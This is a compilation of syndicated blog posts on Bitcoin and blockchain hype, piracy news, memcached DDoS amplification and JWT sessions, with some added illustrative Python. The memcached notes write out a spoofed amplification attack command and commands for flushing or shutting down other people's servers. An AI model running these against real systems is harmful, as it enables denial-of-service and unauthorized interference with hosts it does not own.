Moreover, the point of Bitcoin is not to replace everyday currencies for everyday transactions. If you read Satoshi Nakamoto’s whitepaper, its only goal is to replace certain types of transactions, like purely electronic transactions where electronic goods and services are being exchanged. Where real-life goods/services are being exchanged, existing currencies work just fine. It’s only the crazy activists who claim Bitcoin will eventually replace real world currencies — the saner people see it co-existing with real-world currencies, each with a different value to consumers.

Turning a McNugget back into a chicken

John Oliver uses the metaphor that while you can process a chicken into McNuggets, you can’t reverse the process. It’s a funny metaphor.
But it’s not clear what the heck this metaphor is trying to explain. That’s not a metaphor for the blockchain, but a metaphor for a “cryptographic hash”, where each block is a chicken, and the McNugget is the signature for the block (well, the block plus the signature of the last block, forming a chain).
Even then that metaphor has problems. The McNugget produced from each chicken must be unique to that chicken, for the metaphor to accurately describe a cryptographic hash. You can therefore identify the original chicken simply by looking at the McNugget. A slight change in the original chicken, like losing a feather, results in a completely different McNugget. Thus, nuggets can be used to tell if the original chicken has changed.
This then leads to the key property of the blockchain: it is unalterable. You can’t go back and change any of the blocks of data, because the fingerprints, the nuggets, will also change, and break the nugget chain.
The point is that John Oliver is laughing at a silly metaphor to explain the blockchain because he totally misses the point of the metaphor.
Oliver rightly says “don’t worry if you don’t understand it — most people don’t”, but that includes the big companies that John Oliver names. Some companies do get it, and are producing reasonable things (like JP Morgan, by all accounts), but some don’t. IBM and other big consultancies are charging companies millions of dollars to consult with them on block chain products where nobody involved, the customer or the consultancy, actually understands any of it. That doesn’t stop them from happily charging customers on one side and happily spending money on the other.
Thus, rather than Oliver explaining the problem, he’s just being part of the problem. His explanation of blockchain left you dumber than before.
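
The “nugget chain” described above, as an added example that is not from the original post: each block’s fingerprint is a SHA-256 hash over the previous fingerprint plus the block’s own data, and verification reports where the chain first breaks. The record strings, the `GENESIS` value and all function names are constructed for the illustration.

```python
import copy
import hashlib

GENESIS = "0" * 64  # constructed stand-in for "no previous block"

RECORDS = ["alice pays bob 5", "bob pays carol 2", "carol pays dave 1"]  # constructed


def fingerprint(prev_hash, data):
    """The 'nugget': SHA-256 over the previous fingerprint plus this block's data."""
    return hashlib.sha256((prev_hash + "|" + data).encode("utf-8")).hexdigest()


def build_chain(records):
    chain, prev = [], GENESIS
    for data in records:
        digest = fingerprint(prev, data)
        chain.append({"data": data, "prev": prev, "hash": digest})
        prev = digest
    return chain


def first_broken_link(chain):
    """Index of the first block that no longer verifies, or None if all do."""
    prev = GENESIS
    for index, block in enumerate(chain):
        if block["prev"] != prev:
            return index          # this block points at a fingerprint that changed
        if fingerprint(block["prev"], block["data"]) != block["hash"]:
            return index          # this block's data no longer matches its fingerprint
        prev = block["hash"]
    return None


def tamper(chain, index, new_data, recompute_hash=False):
    """Return a copy with one block's data changed, optionally re-hashing that block."""
    altered = copy.deepcopy(chain)
    altered[index]["data"] = new_data
    if recompute_hash:
        altered[index]["hash"] = fingerprint(altered[index]["prev"], new_data)
    return altered


if __name__ == "__main__":
    chain = build_chain(RECORDS)
    print(first_broken_link(chain))                                   # intact chain
    print(first_broken_link(tamper(chain, 0, "alice pays bob 50")))   # edit detected in place
    # Re-hashing the edited block only moves the break to the block after it.
    print(first_broken_link(tamper(chain, 0, "alice pays bob 50", recompute_hash=True)))
```

Re-hashing the edited block does not hide the change: the next block still carries the old fingerprint, so every later block would have to be rewritten as well.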


John Oliver mocks the Brave ICO ($35 million in 30 seconds), claiming it’s all driven by YouTube personalities and people who aren’t looking at the fundamentals.
And while this is true, most ICOs are bunk, the Brave ICO actually had a business model behind it. Brave is a Chrome-like web-browser whose distinguishing feature is that it protects your privacy from advertisers. If you don’t use Brave or a browser with an ad block extension, you have no idea how bad things are for you. However, this presents a problem for websites that fund themselves via advertisements, which is most of them, because visitors no longer see ads. Brave has a fix for this. Most people wouldn’t mind supporting the websites they visit often, like the New York Times. That’s where the Brave ICO “token” comes in: it’s not simply stock in Brave, but a token for micropayments to websites. Users buy tokens, then use them for micropayments to websites like New York Times. The New York Times then sells the tokens back to the market for dollars. The buying and selling of tokens happens without a centralized middleman.
This is still all speculative, of course, and it remains to be seen how successful Brave will be, but it’s a serious effort. It has well respected VC behind the company, a well-respected founder (despite the fact he invented JavaScript), and well-respected employees. It’s not a scam, it’s a legitimate venture.

How do you make money from Bitcoin?

The last part of the show is dedicated to describing all the scams out there, advising people to be careful, and to be “responsible”. This is garbage.
It’s like my simple two step process to making lots of money via Bitcoin: (1) buy when the price is low, and (2) sell when the price is high. My advice is correct, of course, but useless. Same as “be careful” and “invest responsibly”.
The truth about investing in cryptocurrencies is “don’t”. The only responsible way to invest is to buy low-overhead market index funds and hold for retirement. No, you won’t get super rich doing this, but anything other than this is irresponsible gambling.
It’s a hard lesson to learn, because everyone is telling you the opposite. The entire channel CNBC is devoted to day traders, who buy and sell stocks at a high rate based on the same principle as a ponzi scheme, basing their judgment not on the fundamentals (like long term dividends) but animal spirits of whatever stock is hot or cold at the moment. This is the same reason people buy or sell Bitcoin, not because they can describe the fundamental value, but because they believe in a bigger fool down the road who will buy it for even more.
For things like Bitcoin, the trick to making money is to have bought it over 7 years ago when it was essentially worthless, except to nerds who were into that sort of thing. It’s the same trick to making a lot of money in Magic: The Gathering trading cards, which nerds bought decades ago which are worth a ton of money now. Or, to have bought Apple stock back in 2009 when the iPhone was new, when nerds could understand the potential of real Internet access and apps that Wall Street could not.
That was my strategy: be a nerd, who gets into things. I’ve made a good amount of money on all these things because as a nerd, I was into Magic: The Gathering, Bitcoin, and the iPhone before anybody else was, and bought in at the point where these things were essentially valueless.
At this point with cryptocurrencies, with the non-nerds now flooding the market, there’s little chance of making it rich. The lottery is probably a better bet. Instead, if you want to make money, become a nerd, obsess about a thing, understand a thing when it’s new, and cash out once the rest of the market figures it out. That might be Brave, for example, but buy into it because you’ve spent the last year studying the browser advertisement ecosystem, the market’s willingness to pay for content, and how their Basic Attention Token delivers value to websites — not because you want in on the ICO craze.


John Oliver spends 25 minutes explaining Bitcoin, Cryptocurrencies, and the Blockchain to you. Sure, it’s funny, but it leaves you worse off than when it started. The show admits it “simplifies” the explanation, but it simplified so much that it removed all useful information.

Streaming Link Search Engine Alluc Shuts Down

Post Syndicated from Ernesto original https://torrentfreak.com/streaming-link-search-engine-alluc-shuts-down-180309/

With 80 million streaming links to more than 700 video services, Alluc sold itself as the premier streaming link site.

It offered a wide variety of content and over the past thirteen years it grew out to become one of the largest sites of its kind. This week, however, Alluc surprised friend and foe by shutting down.

“The alluc search engine has been discontinued. After 13 years of alluc, we decided to take a break and focus on other projects,” a message posted on the site’s homepage reads.

That the site was popular is not a secret. People used it to find streaming links to nearly everything, from old movies to the latest hit series. The operators mention that they served a billion unique visitors over the past decade, which is an incredible achievement.

Alluc says farewell

What’s less clear, however, is why the site decided to stop now. In the past, we’ve reported on similar sites that threw in the towel because revenue was dwindling, but Alluc told us that is not the case here.

“The decision was not driven by monetary reasons. We started alluc when we were still in high-school and it became into something bigger and better than we could have ever imagined when we started it,” Alluc’s Sebastian tells us.

“But now it’s time for us to move on. We hope to have contributed a lot to the video space and to have helped out a lot of people during these 13 years of running alluc full time.”

While Alluc could be used to find both authorized and unauthorized content, the movie industry saw it as a blatant pirate site. This resulted in a site blocking request in Australia, among other things.

Alluc, however, always rejected the ‘pirate’ label and saw itself as an “uncensored” search engine. While they are shutting down now, they still see a future for similar services.

“There will always be a future for uncensored search and I hope us shutting down alluc can help to create the vacuum needed to incentivize new sites of similar quality and scope or even a decentralized solution to be created by others,” Sebastian tells us.

Time will tell whether another site will indeed jump in to fill the gap.

Alluc’s API, which is used by third-party apps and services to find streaming links, will remain available until the end of the month when it will shut down. Meanwhile, Alluc’s search engine framework lives on at pron.tv, an adult-themed site.

Source: TF, for the latest info on copyright, file-sharing, torrent sites and more. We also have VPN discounts, offers and coupons

ISP Wants EU Court Ruling on Identifying ‘Pirating’ Subscribers

Post Syndicated from Ernesto original https://torrentfreak.com/isp-wants-eu-court-ruling-on-identifying-pirating-subscribers-180308/

In recent years Internet provider Bahnhof has fought hard to protect the privacy of its subscribers.

The company has been a major opponent of extensive data retention requirements, has launched a free VPN to its users, and vowed to protect subscribers from a looming copyright troll invasion.

The privacy-oriented ISP is doing everything in its power to prevent its Swedish customers from being exposed. It has even refused to hand over customer details in piracy cases when these requests are made by the police.

This stance resulted in a lawsuit in which Bahnhof argued that piracy isn’t a serious enough offense to warrant invading the privacy of its customers. The ISP said that this is in line with European privacy regulations.

Last month, the Administrative Court in Stockholm disagreed with this argument, ordering the ISP to hand over the requested information.

The Court ruled that disclosure of subscriber data to law enforcement agencies does not contravene EU law. It, therefore, ordered the ISP to comply, as the Swedish Post and Telecom Authority (PTS) had previously recommended.

While the order is a serious setback for Bahnhof, the ISP isn’t letting the case go just yet. It has filed an appeal where it maintains that disclosing details of alleged pirates goes against EU regulations.

Bahnhof says NO

To settle the matter once and for all, Bahnhof has asked the Swedish Appeals Court to refer the case to the EU Court of Justice, to have an EU ruling on the data disclosure issue.

“Bahnhof, therefore, requires the Court of Appeal to obtain a preliminary ruling from EU law so that the European Court of Justice itself can rule on the matter before the Court of First Instance reaches a final position,” Bahnhof writes.

Law enforcement requests for piracy-related data are quite common in Sweden. Bahnhof previously showed that more than a quarter of all police requests for subscriber data were for cases related to online file-sharing, trumping crimes such as grooming minors, forgery and fraud.

The ISP is vowing to fight this case to the bitter end. While it has no problem with law enforcement efforts in general, the company doesn’t want to hand over customer data without proper judicial review of a suspected crime.

“This legal process has already been going on for two years and Bahnhof is ready to continue for as long as necessary to achieve justice. Bahnhof will never agree to hand over delicate sensitive customer data without judicial review,” the company concludes.


Some notes on memcached DDoS

Post Syndicated from Robert Graham original http://blog.erratasec.com/2018/03/some-notes-on-memcached-ddos.html

I thought I’d write up some notes on the memcached DDoS. Specifically, I describe how many I found scanning the Internet with masscan, and how to use masscan as a killswitch to neuter the worst of the attacks.

Test your servers

I added code to my port scanner for this, then scanned the Internet:
masscan -pU:11211 --banners | grep memcached
This example scans the entire Internet (/0). Replace it with your address range (or ranges).
This produces output that looks like this:
Banner on port 11211/udp on [memcached] uptime=230130 time=1520485357 version=1.4.13
Banner on port 11211/udp on [memcached] uptime=3935192 time=1520485363 version=1.4.17
Banner on port 11211/udp on [memcached] uptime=230130 time=1520485357 version=1.4.13
Banner on port 11211/udp on [memcached] uptime=399858 time=1520485362 version=1.4.20
Banner on port 11211/udp on [memcached] uptime=29429482 time=1520485363 version=1.4.20
Banner on port 11211/udp on [memcached] uptime=2879363 time=1520485366 version=1.2.6
Banner on port 11211/udp on [memcached] uptime=42083736 time=1520485365 version=1.4.13
The “banners” check filters out those with valid memcached responses, so you don’t get other stuff that isn’t memcached. To filter this output further, use ‘cut’ to grab just column 6:
… | cut -d ' ' -f 6 | cut -d: -f1
You often get multiple responses to just one query, so you’ll want to sort/uniq the list:
… | sort | uniq

My results from an Internet wide scan

I got 15181 results (or roughly 15,000).
People are using Shodan to find a list of memcached servers. They might be getting a lot of results back that respond to TCP instead of UDP. Only UDP can be used for the attack.

Other researchers scanned the Internet a few days ago and found ~31k. I don’t know if this means people have been removing these from the Internet.

Masscan as exploit script

BTW, you can not only use masscan to find amplifiers, you can also use it to carry out the DDoS. Simply import the list of amplifier IP addresses, then spoof the source address as that of the target. All the responses will go back to the source address.
masscan -iL amplifiers.txt -pU:11211 –spoof-ip –rate 100000
I point this out to show how there’s no magic in exploiting this. Numerous exploit scripts have been released, because it’s so easy.

Why memcached servers are vulnerable

Like many servers, memcached listens to local IP address for local administration. By listening only on the local IP address, remote people cannot talk to the server.
However, this process is often buggy, and you end up listening on either (all interfaces) or on one of the external interfaces. There’s a common Linux network stack issue where this keeps happening, like trying to get VMs connected to the network. I forget the exact details, but the point is that lots of servers that intend to listen only on end up listening on external interfaces instead. It’s not a good security barrier.
Thus, there are lots of memcached servers listening on their control port (11211) on external interfaces.

How the protocol works

The protocol is documented here. It’s pretty straightforward.
The easiest amplification attack is to send the “stats” command. This is a 15-byte UDP packet that causes the server to send back a large response full of useful statistics about the server. You often see around 10 kilobytes of response across several packets.
A harder, but more effective attack uses a two step process. You first use the “add” or “set” commands to put chunks of data into the server, then send a “get” command to retrieve it. You can easily put 100-megabytes of data into the server this way, and cause its retrieval with a single “get” command.
That’s why this has been the largest amplification ever, because a single 100-byte packet can in theory cause a 100-megabyte response.
Doing the math, the 1.3 terabit/second DDoS divided across the 15,000 servers I found vulnerable on the Internet leads to an average of 100-megabits/second per server. This is fairly minor, and is indeed something even small servers (like Raspberry Pis) can generate.
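
On the receiving end, the same framing lets a defender recognise and size this traffic. The following is an added example, not code from the original post: it parses the 8-byte memcached UDP frame header (request ID, sequence number, datagram count, reserved, all 16-bit big-endian) of inbound datagrams, totals bytes per sender, and separates “stats” replies from stored-value (“get”) replies. The tuples stand in for packets read from a capture, and the addresses and payloads are constructed from documentation ranges.

```python
import struct
from collections import defaultdict

MEMCACHED_PORT = 11211
# 8-byte frame header plus the command line: the 15-byte request the post mentions.
STATS_REQUEST_LEN = 8 + len(b"stats\r\n")


def parse_frame(payload):
    """Split a memcached UDP payload into (request_id, seq, total, body).

    Returns None when the bytes cannot be a memcached UDP frame.
    """
    if len(payload) < 8:
        return None
    request_id, seq, total, reserved = struct.unpack("!HHHH", payload[:8])
    if reserved != 0 or total == 0 or seq >= total:
        return None
    return request_id, seq, total, payload[8:]


def classify(body):
    """Name the reply type from the first datagram of a response."""
    if body.startswith(b"STAT "):
        return "stats"
    if body.startswith(b"VALUE "):
        return "get"
    return "other"


def summarize(datagrams):
    """Aggregate inbound datagrams from UDP source port 11211 per sender."""
    per_source = defaultdict(lambda: {"datagrams": 0, "bytes": 0, "kinds": set()})
    for src_ip, src_port, payload in datagrams:
        if src_port != MEMCACHED_PORT:
            continue
        frame = parse_frame(payload)
        if frame is None:
            continue
        _, seq, _, body = frame
        entry = per_source[src_ip]
        entry["datagrams"] += 1
        entry["bytes"] += len(payload)
        if seq == 0:                       # only the first datagram names the reply
            entry["kinds"].add(classify(body))
    return dict(per_source)


def stored_value_sources(summary):
    """Senders replaying cached values: the two-step variant described in the post."""
    return sorted(ip for ip, entry in summary.items() if "get" in entry["kinds"])


def amplification_factor(response_bytes, request_bytes=STATS_REQUEST_LEN):
    return response_bytes / request_bytes


def build_frame(request_id, seq, total, body):
    return struct.pack("!HHHH", request_id, seq, total, 0) + body


# Constructed sample traffic as (source IP, source port, UDP payload).
SAMPLE = [
    ("192.0.2.10", 11211, build_frame(0, 0, 2, b"STAT pid 1\r\n" + b"x" * 1388)),
    ("192.0.2.10", 11211, build_frame(0, 1, 2, b"y" * 1392)),
    ("198.51.100.7", 11211,
     build_frame(7, 0, 1, b"VALUE k 0 1300\r\n" + b"z" * 1300 + b"\r\nEND\r\n")),
    ("203.0.113.5", 53, b"\x00" * 40),      # other UDP traffic: wrong source port
    ("203.0.113.9", 11211, b"\x01\x02"),    # too short to carry a frame header
]

if __name__ == "__main__":
    summary = summarize(SAMPLE)
    for ip, entry in sorted(summary.items()):
        print(ip, entry["datagrams"], entry["bytes"], sorted(entry["kinds"]),
              round(amplification_factor(entry["bytes"]), 1))
    print(stored_value_sources(summary))
```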

Neutering the attack (“kill switch”)

If they are using the more powerful attack against you, you can neuter it: you can send a “flush_all” command back at the servers who are flooding you, causing them to drop all those large chunks of data from the cache.
I’m going to describe how I would do this.
First, get a list of attackers, meaning, the amplifiers that are flooding you. The way to do this is grab a packet sniffer and capture all packets with a source port of 11211. Here is an example using tcpdump.
tcpdump -i <interface> -w attackers.pcap src port 11211
Let that run for a while, then hit [ctrl-c] to stop, then extract the list of IP addresses in the capture file. The way I do this is with tshark (comes with Wireshark):
tshark -r attackers.pcap -Tfields -eip.src | sort | uniq > amplifiers.txt
Now, craft a flush_all payload. There are many ways of doing this. For example, if you are using nmap or masscan, you can add the bytes to the nmap-payloads.txt file. Also, masscan can read this directly from a packet capture file. To do this, first craft a packet, such as with the following command line foo:
echo -en "\x00\x00\x00\x00\x00\x01\x00\x00flush_all\r\n" | nc -q1 -u <server> 11211
Capture this packet using tcpdump or something, and save into a file “flush_all.pcap”. If you want to skip this step, I’ve already done this for you, go grab the file from GitHub:
Now that we have our list of attackers (amplifiers.txt) and a payload to blast at them (flush_all.pcap), use masscan to send it:
masscan -iL amplifiers.txt -pU:11211 --pcap-payload flush_all.pcap

Reportedly, “shutdown” may also work to completely shut down the amplifiers. I’ll leave that as an exercise for the reader, since of course you’ll be adversely affecting the servers.

Some notes

Here is some good reading on this attack:

Welte: Report from the Geniatech vs. McHardy GPL violation court hearing

Post Syndicated from corbet original https://lwn.net/Articles/748761/rss

Harald Welte attended a hearing in one of the Patrick McHardy GPL cases and wrote up what he saw.

I’m not arguing for a “too soft” approach. It’s
almost 15 years since the first court cases on license violations on
(embedded) Linux, and the fact that the problem still exists today clearly
shows the industry is very far from having solved a seemingly rather simple

On the other hand, such activities must always be oriented to compliance,
and compliance only. Collecting huge amounts of contractual penalties is
questionable. And if it was necessary to collect such huge amounts to
motivate large corporations to be compliant, then this must be done in the
open, with the community knowing about it, and the proceeds of such
contractual penalties must be donated to free software related entities to
prove that personal financial gain is not a motivation.

Spotify Owned uTorrent Before BitTorrent Inc. Acquired It

Post Syndicated from Ernesto original https://torrentfreak.com/spotify-owned-utorrent-before-bittorrent-acquired-it-180305/

When Spotify launched its first beta in the fall of 2008, we described it as “an alternative to music piracy.”

From the start, the Swedish company set out to compete with pirate services by offering a better user experience. Now, a decade later, it has come a long way.

The company successfully transformed into a billion-dollar enterprise and is planning to go public with a listing on the New York Stock Exchange. While it hasn’t completely evaporated music piracy, it has converted dozens of millions of people into paying customers.

While Spotify sees itself as a piracy remedy, backed by the major labels, its piracy roots are undeniable.

In a detailed feature, Swedish newspaper Breakit put a spotlight on one of Spotify’s earliest employees, developer Ludvig Strigeus.

With a significant stake in the company, he is about to become a multi-millionaire, one with a noteworthy file-sharing past. It’s unclear what his current stake in Spotify is, but according to Swedish media it’s worth more than a billion Kroner, which is over $100 million.

Strigeus was the one who launched uTorrent in September 2005, when the BitTorrent protocol was still fairly new. Where most BitTorrent clients at the time were bloatware, uTorrent chose a minimalist approach, but with all essential features.

This didn’t go unnoticed. In just a few months, millions of torrent users downloaded the application which quickly became the dominant file-sharing tool.

Little more than a year after its launch the application was acquired by BitTorrent Inc., which still owns it today. While that part of history is commonly known, there’s a step missing.

Strigeus’ coding talent also piqued the interest of Spotify, which reportedly beat BitTorrent Inc. by a few months. Multiple sources confirm that the streaming startup, which had yet to release its service at the time, bought uTorrent in 2006.

While some thought that Spotify was mainly interested in the technology, others see Strigeus as the target.

“Spotify bought μTorrent, but what we really wanted was Ludvig Strigeus,” former Spotify CEO Andreas Ehn told Breakit.

This indeed sounds plausible as Spotify sold uTorrent to BitTorrent Inc. after a few months, keeping the developer on board. Not a bad decision for the latter, as his Spotify stake makes him a billionaire. At the same time, it was an important move for Spotify too.

Ludvig (Ludde) is still credited in recent uTorrent releases

In addition to having a very talented developer on board, who helped to implement the much needed P2P technology into Spotify, the deal with BitTorrent Inc. brought in cash that funded the development of the tiny, but ambitious, streaming service.

It might be too much to argue that Spotify wouldn’t be where it is without uTorrent and its creator, but their impact on the young company was significant.

The file-sharing angle was also very prominent in the early releases of Spotify. At the time, of all the tracks that were streamed over the Internet by Spotify users, the majority were streamed via P2P connections.

And we haven’t even mentioned that Spotify reportedly used pirate MP3s for its Beta release, including some tracks that were only available on The Pirate Bay.

Spotify’s brief ownership of uTorrent isn’t commonly known, to make an understatement. When BitTorrent Inc. announced that it acquired “uTorrent AB” there was no mention of Spotify, which was still an unknown company at the time.

Times change.


Using JWT For Sessions

Post Syndicated from Bozho original https://techblog.bozho.net/using-jwt-sessions/

The topic has been discussed many times, on hacker news, reddit, blogs. And the consensus is – DON’T USE JWT (for user sessions).

And I largely agree with the criticism of typical arguments for the JWT, the typical “but I can make it work…” explanations and the flaws of the JWT standard.

I won’t repeat everything here, so please go and read those articles. You can really shoot yourself in the foot with JWT, it’s complex to get to know it well and it has few benefits for most use cases. I guess for API calls it makes sense, especially if you reuse the same API in a single-page application and for your RESTful clients, but I’ll focus on the user session use case.

Having all this criticism, I’ve gone against what the articles above recommend, and use JWT, navigating through their arguments and claiming I’m in a sweet spot. I can very well be wrong.

I store the user ID in a JWT token stored as a cookie. Not local storage, as that’s problematic. Not the whole state, as I don’t need that and it may lead to problems (pointed out in the linked articles). In fact, I don’t have any session state apart from the user data, which I think is a good practice.

What I want to avoid in my setup is sharing sessions across nodes. And this is a very compelling reason to not use the session mechanism of your web server/framework. No, you don’t need to have millions of users in order to need your application to run on more than one node. In fact, it should almost always run on (at least) two nodes, because nodes die and you don’t want downtime. Sticky sessions at the load balancer are a solution to that problem but you are just outsourcing the centralized session storage to the load balancer (and some load balancers might not support it). Shared session cache (e.g. memcached, elasticache, hazelcast) is also an option, and many web servers (at least in Java) support pluggable session replication mechanisms, but that introduces another component to the architecture, another part of the stack to be supported and that can possibly break. It is not necessarily bad, but if there’s a simple way to avoid it, I’d go for it.

In order to avoid shared session storage, you need either the whole session state to be passed in the request/response cycle (as cookie, request parameter, header), or to receive a userId and load the user from the database or a cache. As we’ve learned, the former might be a bad choice. Despite the fact that frameworks like ASP.NET and JSF dump the whole state in the HTML of the page, it doesn’t intuitively sound good.

As for the latter – you may say “ok, if you are going to load the user from the database on every request this is going to be slow and if you use a cache, then why not use the cache for the sessions themselves?”. Well, the cache can be local. Remember we have just a few application nodes. Each node can have a local, in-memory cache for the currently active users. The fact that all nodes will have the same user loaded (after a few requests are routed to them by the load balancer in a round-robin fashion) is not important, as that cache is small. But you won’t have to take any care for replicating it across nodes, taking care of new nodes coming and going from the cluster, dealing with network issues between the nodes, etc. Each application node will be an island not caring about any other application node.

So here goes my first objection to the linked articles – just storing the user identifier in a JWT token is not pointless, as it saves you from session replication.

What about the criticism for the JWT standard and the security implications of its cryptography? Entirely correct, it’s easy to shoot yourself in the foot. That’s why I’m using JWT only with MAC, and only with a particular algorithm that I verify upon receiving the token, thus (allegedly) avoiding all the pitfalls. In all fairness, I’m willing to use the alternative proposed in one of the articles – PASETO – but it doesn’t have a Java library and it will take some time implementing one (might do in the future). To summarize – if there was another easy to use way for authenticated encryption of cookies, I’d use it.

So I’m basically using JWT in “PASETO-mode”, with only one operation and only one algorithm. And that should be fine as a general approach – the article doesn’t criticize the idea of having a user identifier in a token (and a stateless application node), it criticizes the complexity and vulnerabilities of the standard. This is sort of my second objection – “Don’t use JWT” is widely understood to mean “Don’t use tokens”, where that is not the case.
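The “one operation, one algorithm” check described above, as an added example that is not the author’s code: a token carrying only the user ID, issued and verified with HMAC-SHA256 using the Python standard library rather than a JWT library. The claim names `sub` and `exp`, the one-hour default lifetime and all function names are assumptions.

```python
import base64, hashlib, hmac, json, time

ALG = "HS256"  # assumption: the single MAC algorithm this application accepts

def b64e(raw):
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode("ascii")

def b64d(text):
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))

def mac(key, signing_input):
    return hmac.new(key, signing_input.encode("ascii"), hashlib.sha256).digest()

def issue(key, user_id, ttl=3600, now=None):
    """Mint a token whose only state is the user ID and an expiry."""
    now = int(time.time()) if now is None else now
    header = b64e(json.dumps({"alg": ALG, "typ": "JWT"}).encode())
    payload = b64e(json.dumps({"sub": user_id, "exp": now + ttl}).encode())
    signing_input = header + "." + payload
    return signing_input + "." + b64e(mac(key, signing_input))

def verify(key, token, now=None):
    """Return the user ID, or None if the token must be rejected."""
    now = int(time.time()) if now is None else now
    try:
        header_b64, payload_b64, sig_b64 = token.split(".")
        header = json.loads(b64d(header_b64))
        # Pin the algorithm: the token never chooses how it is checked,
        # so "none" or an asymmetric alg is refused before any MAC work.
        if not isinstance(header, dict) or header.get("alg") != ALG:
            return None
        expected = mac(key, header_b64 + "." + payload_b64)
        if not hmac.compare_digest(expected, b64d(sig_b64)):  # constant time
            return None
        claims = json.loads(b64d(payload_b64))  # parsed only after the MAC passes
        if not isinstance(claims, dict):
            return None
        sub, exp = claims.get("sub"), claims.get("exp")
        if not isinstance(sub, str) or not isinstance(exp, int) or exp <= now:
            return None
        return sub
    except (ValueError, TypeError):
        return None  # malformed base64, JSON or segment count
```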

Have I introduced some vulnerability in my striving for architectural simplicity and lack of shared state? I hope not.

The post Using JWT For Sessions appeared first on Bozho's tech blog.

Comcast’s Protected Browsing Blocks TorrentFreak as “Suspicious” Site

Post Syndicated from Ernesto original https://torrentfreak.com/comcasts-protected-browsing-blocks-torrentfreak-as-suspicious-site-18004/

Regular TorrentFreak readers know that website blocking is rampant around the globe.

Thousands of pirate sites have been blocked by court orders for offering access to infringing content. However, there are plenty of voluntary blocking measures as well.

Some Internet providers offer web filtering tools to help their customers avoid malware, adult content, pirate services, or other suspicious content. Comcast’s Xfinity Xfi service, for example, has a “protected browsing” feature.

While this can be useful in some situations, it’s far from perfect. The blocklists that are used can be quite broad. Websites are sometimes miscategorized or flagged as dangerous while that’s not the case.

This also appears to be happening with Xfinity’s protected browsing feature. A reader alerted us that, when he tried to access TorrentFreak, access was denied stating that a “suspicious” site was ahead.

A pirate logo on the blocking page suggests that there’s copyright-infringing activity involved. While it’s no secret that we cover a lot of news related to piracy, it goes a bit far to label this type of news reporting as suspicious.


While we don’t know whether the blockade is intentional or a false positive, this is certainly not the only ‘problem’ with Xfinity’s protected browsing feature.

Previously, Comcast users reported that this system prevented people from accessing PayPal as well, which is a bit much, and others reported that it stopped the Steam store from loading properly.

The good news is that the blocking ‘feature’ isn’t mandatory. Subscribers can enable and disable it whenever they please, by changing their network settings.

Unfortunately, Xfinity’s blocking efforts are not unique. We regularly get reports from users who can’t access TorrentFreak because it’s blocked, often on public WiFi networks. In these and other cases, a VPN can always come in handy.
